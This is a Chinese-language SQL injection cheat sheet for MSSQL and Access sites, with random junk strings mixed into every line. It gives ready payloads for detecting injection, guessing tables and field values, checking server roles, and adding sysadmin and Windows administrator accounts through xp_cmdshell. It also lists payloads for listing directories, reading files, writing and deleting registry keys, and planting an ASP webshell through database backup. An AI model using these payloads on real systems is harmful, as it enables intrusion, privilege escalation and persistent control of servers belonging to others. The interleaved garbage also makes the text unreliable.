1.判断是否有注入;and 1=1 ;and 1=2 a3wk#mH
2.初步判断是否是mssql ;and user>0 3~ptD5@WF
Y0?<~Gf
3.注入参数是字符'and [查询条件] and ''=' c H7Gb|,M
yh'uH
4.搜索时没过滤参数的'and [查询条件] and '%25'=' G.B~n>}JU,
Mr}K-C?ge
5.判断数据库系统 DKG99biJN
VUQx"R9-
;and (select count(*) from sysobjects)>0 mssql "3Lq/mJYnZ
QIWfGVc-
;and (select count(*) from msysobjects)>0 access 6");NHE
^77Q4"{W
voitdz
L"(k;Mfe
6.猜数据库 ;and (select Count(*) from [数据库名])>0 {kdS t1
AEw~LF2w
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 T4e-QEH
IwZe2$f
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 $:u5XJx
<fm<UO,%
9.(1)猜字段的ascii值(access) D\LXjEme.
P: QSr8K
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 <?E~Qc t
Oe_*(q&
(2)猜字段的ascii值(mssql) R\MFh!6sn
gc[BP>tl\
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 =}xH6^It
py':UQS*q
10.测试权限结构(mssql) qHf8z;lc
y7@q]~%
|qq7vx
y yqya[-11
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- T:|PSJc0
s+@`Z*B5
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- &~&nJr
?(2^lH~6h
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- QG8X{'
*,y .%`o
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 7@u:F?c
8Ben}j)H
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- =P)H3|AdIm
8;q2W
F{AX
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- C9Xj)5k@R
6 66f;h
;and 1=(select IS_MEMBER('db_owner'));-- +hL%8CVU M
=*'K'e>P3
zv>7;En3
T8US` MZ
11.添加mssql和系统的帐户 `F,*NESv
Jr.4Y>;}e3
;exec master.dbo.sp_addlogin username;-- LR:meCOI
;exec master.dbo.sp_password null,username,password;-- &Z%|H>+;T
tjWf`#tH>H
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- oRZ--1oR_
IM 8lA
;exec master.dbo.xp_cmdshell 'net user username password RS9mAeX4h
7:P+ S%ZL
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- qf?X:9Wt
Ns#R`WG)
;exec master.dbo.xp_cmdshell 'net user username password /add';-- UWIw/(Mv/]
l0@+&Xj
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- d>k"#|
>oasA2S
P; DGs]PF
90[?)s
12.(1)遍历目录 &
G8tb>q<V
#Ks2a):8
;create table dirs(paths varchar(100), id int) N799@:.
$^ZugD
;insert dirs exec master.dbo.xp_dirtree 'c:\' oJln"-M1nx
dHJ#xmE!pP
;and (select top 1 paths from dirs)>0 *)0-N!N#)
J<27w3bs~p
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) }N`m7PSf
[~UCYYl
3 6-Sw
g|V md
(2)遍历目录 HTw7l]]
kY.3x#w
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- *c{X\!YBh
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 #*)X+*
:}{,u6\
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 @q<F_'7is
m|%ly
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 l/ :23\
Ow f:Kife
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 $5v:z
rc ()Eo50
IuN:*P
0.kQqy~5
13.mssql中的存储过程 _YPu
KoF_G[m
xp_regenumvalues 注册表根键, 子键 L.R4 iN
^f_4w|u,+
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 }Gi4`Es
p&Ev"xhs
xp_regread 根键,子键,键值名 jTE~^
e%K
oecq
;exec xp_regread J0V\_ja-
hJkF-yW
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值
YIZ+BVa
45H(.}&f
xp_regwrite 根键,子键, 值名, 值类型, 值 *r|)@K|
C)v*L#{%
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 f>kW\uC
i?D
KKjN$
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 CF0i72ul5
8-uRn38
xp_regdeletevalue 根键,子键,值名 Y>i5ubR~
b@?pofZ`k
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 9aKt (g6
z(JDLd
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 p0Ra`*f
p"k[ac{
tShyG!b
dp~] Wx
14.mssql的backup创建webshell m%[`NP (
zM+eb| >cr
use model '%\FT-{
p"ElO,\
create table cmd(str image); ZCuLgCP?Z
Z&[_8Y5j
insert into cmd(str) values (''); w$%1j+%&
Ks_B%d
backup database model to disk='c:\l.asp'; Y}UVC|Ef
M,(UCyT
V<W$h`
_DAj$$ Ru4
15.mssql内置函数 -FrNk>
3,[#%}1(S
;and (select @@version)>0 获得Windows的版本号 KV { J>J1
l0G sY.~,
;and user_name()='dbo' 判断当前系统的连接用户是不是sa :$5$H
=&YhA}l\O
;and (select user_name())>0 爆当前系统的连接用户 .sE5QRVc
WO<a^g
{
;and (select db_name())>0 得到当前连接的数据库
SdM@7%UK
71(C@/J
?@LqrKj11
GiGXV @dq
16.简洁的webshell . ]D7Il
#Rx|oSc}
use model
1Bhd-
q[Ed6FM$~
create table cmd(str image); *Z:'jV<
o b,%); m
insert into cmd(str) values (''); I {&8iUN
O\&[|sGY{
backup database model to disk='g:\wwwtest\l.asp';